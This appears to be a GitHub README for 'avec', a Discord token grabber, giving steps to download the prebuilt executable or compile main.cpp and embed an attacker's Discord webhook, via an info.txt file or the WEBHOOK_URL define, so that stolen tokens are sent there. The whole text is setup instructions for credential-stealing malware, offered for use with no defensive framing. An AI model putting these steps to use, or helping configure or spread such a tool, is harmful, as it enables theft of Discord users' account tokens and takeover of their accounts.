A small self-patch Discord token grabber
- Download
avec.exefromhttps://github.com/juvoy/avec/releases - Create a text file called
info.txt - Paste your Discord webhook into the file
- Drag the file
info.txtintoavec.exe - You should now have a
avec.exewith your webhook
Keep in mind that your webhook is now not obfuscated in any way!
2025-04-15.21-29-52.mp4
You will need
- Visual Studio 2022 (v143)
- Open
main.cpp - You will find
#define WEBHOOK_URL skCrypt("EXAMPLE_HOOK")somewhere at the top - Change
EXAMPLE_HOOKto your webhook - Compile it in release and x64